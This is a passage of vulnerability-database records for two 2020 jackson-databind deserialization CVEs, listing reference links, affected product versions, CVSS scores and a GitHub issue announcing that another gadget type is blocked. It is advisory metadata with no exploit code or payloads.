"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "29BC94E0-FEBC-4E86-825C-0101DC339852", "versionEndExcluding": "2.7.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "04F30C23-46F8-4F58-807B-002C5E96B7F7", "versionEndExcluding": "2.8.11.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "021014B2-DC51-481C-BCFE-5857EFBDEDDA", "versionEndExcluding": null, "versionEndIncluding": "8.1.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.6", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "37C8EE84-A840-4132-B331-C7D450B1FBBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "EB4FBBDC-0AAF-4E9B-9902-02E7B4EF4E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "1FBF422E-3F67-4599-A7C1-0E2E4224553A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "72F28CE3-F835-4458-8D70-CBE9FC2F7E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "9F058FDA-04BC-4F32-830D-206983770692", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "378A6656-252B-4929-83EA-BC107FDFD357", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2631
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
(note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-9546 Reporters: threedr3am & LFY Fix will be included in: * 2.9.10.4 * 2.8.11.6 (`jackson-bom` version `2.8.11.20200310`) * 2.7.9.7 * Does not affect 2.10.0 and later
Block one more gadget type (shaded-hikari-config, CVE-2020-9546)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2631/comments
8
2020-02-27T21:17:02Z
2020-03-23T21:00:52Z
https://github.com/FasterXML/jackson-databind/issues/2631
572,364,748
2,631
1,097
CVE-2020-9547
2020-03-02T04:15:11.017
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": 